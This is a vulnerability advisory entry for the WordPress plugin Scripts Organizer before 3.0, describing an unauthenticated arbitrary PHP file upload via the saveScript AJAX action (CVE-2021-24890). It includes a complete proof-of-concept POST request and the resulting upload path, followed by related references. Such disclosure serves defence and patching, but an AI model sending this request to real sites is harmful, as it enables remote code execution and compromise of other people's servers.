Lucene search
Ovidiu MaghetiuWPEX-ID:F3B450D2-84CE-4C13-AD6A-B60785DEE7E7HistorySep 05, 2022 - 12:00 a.m.
Scripts Organizer < 3.0 - Unauthenticated Arbitrary File Upload
2022-09-0500:00:00
Ovidiu Maghetiu
70
unauthenticated arbitrary file upload
post
scripts organizer
0.001 Low
EPSS
Percentile
40.9%
The plugin does not have capability and CSRF checks in the saveScript AJAX action, available to both unauthenticated and authenticated users, and does not validate user input in any way, which could allow unauthenticated users to put arbitrary PHP code in a file
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 295
action=saveScript&php_script=%22%3C%3Fphp+die('test')%3B%22&SCORG_enable_script=1&form_data=post_status%3Dpublish%26post_name%3Dtest%26post_author%3D1%26post_name%3Dtest%26post_ID%3D200%26post_title%3Dtest%26SCORG_enable_script%3D1%26SCORG_trigger_location%3Deverywhere%26SCORG_script_type%3Dphp
The file will be at https://example.com/wp-content/uploads/scripts-organizer/200.phpReferences
Related
cvelist
cvelist
cnvd
cnvd
WordPress Scripts Organizer Arbitrary File Upload Vulnerability
2022-09-28 00:00:00
cve
cve
CVE-2021-24890
2022-09-26 13:15:09
nvd
nvd
CVE-2021-24890
2022-09-26 13:15:09
prion
prion
Cross site request forgery (csrf)
2022-09-26 13:15:00
wpvulndb
wpvulndb
Scripts Organizer < 3.0 - Unauthenticated Arbitrary File Upload
2022-09-05 00:00:00
patchstack
patchstack